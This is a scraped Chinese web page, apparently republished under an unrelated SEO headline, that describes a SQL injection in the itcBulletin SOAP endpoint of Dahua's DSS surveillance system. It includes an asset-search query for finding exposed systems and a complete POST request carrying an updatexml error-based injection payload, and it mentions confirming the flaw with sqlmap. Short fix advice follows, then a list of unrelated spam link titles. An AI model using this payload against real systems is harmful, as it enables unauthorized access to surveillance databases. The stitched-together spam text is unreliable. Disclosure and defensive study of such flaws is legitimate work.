当前位置: 首页 > news >正文

服装网站建设公司推荐景安免费虚拟主机

news 2025/9/18 5:58:07
服装网站建设公司推荐,景安免费虚拟主机,wordpress spotless,html静态网页制作成品漏洞简介 大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。 资产测绘 app“dahua-DSS” 漏洞复现 POC: POST /portal/services/itcBulletin?wsdl HTTP/1.1 H…

漏洞简介

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。

资产测绘

app=“dahua-DSS”

在这里插入图片描述

漏洞复现

POC:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host:your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 341
Accept-Encoding: gzip<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'><s11:Body><ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'><netMarkings>(updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (1=1</netMarkings></ns1:deleteBulletin></s11:Body>
</s11:Envelope>

在这里插入图片描述

成功查询出当前数据库。

Sqlmap验证

在这里插入图片描述

修复建议

1.升级至应用最新版本
2.部署WAF防火墙进行防护。

http://www.yayakq.cn/news/429963/

相关文章:

  • 长沙建设银行招聘网站可以制作h5的网站
  • 那里有帮做网站的产品设计工程师
  • 东莞免费做网站公司海南专业网站建设定制
  • 直接用ip访问网站wordpress怎么开发app
  • 新建网站功能模块深圳竞价排名网络推广
  • 珠海门户网站建设报价医院网站素材
  • 网站迁移后 后台进不去福州响应式网站
  • 网站301跳转信息流广告形式主要有
  • dedecms网站logo男女做羞羞事试看网站
  • 济南网站seo外包简历模板免费网站
  • 任务一 分析电子商务网站栏目结构wordpress英语培训主题
  • 如何加强精神文明网站建设内容灵璧县住房和城乡建设局网站
  • 大型网站要多少钱wordpress站内查找
  • 擅自使用他人产品做网站宣传株洲seo排名
  • nft制作网站网站源码地址怎么看
  • window服务器如何做网站访问家庭农场网站建设
  • 茶叶网站建设要求如何建立自己的直播平台
  • 网站建设原则五大原则网络销售怎么做才能做好
  • 网站备案 个人组网方案公司注册资本可以随便填吗
  • 长春网站策划网站头部优化文字怎么做
  • 当前网站开发什么语言jupiter wordpress
  • 做网站 绍兴十大门户网站
  • 做旅游网站需要什么2024年新手机上市时间表
  • 做网站要求的资料营销型网站建设营销型
  • 地方汽车网站模板购买编程培训加盟
  • 南通企业网站建设公司网站设计与程序方向专业
  • 优秀网站建设服务wordpress外贸主题免费下载
  • dedecms企业网站深圳苍松大厦 网站建设
  • 网站建设全流程图视频网站开发价格
  • 河南县wap网站建设公司长沙建长沙建网站公司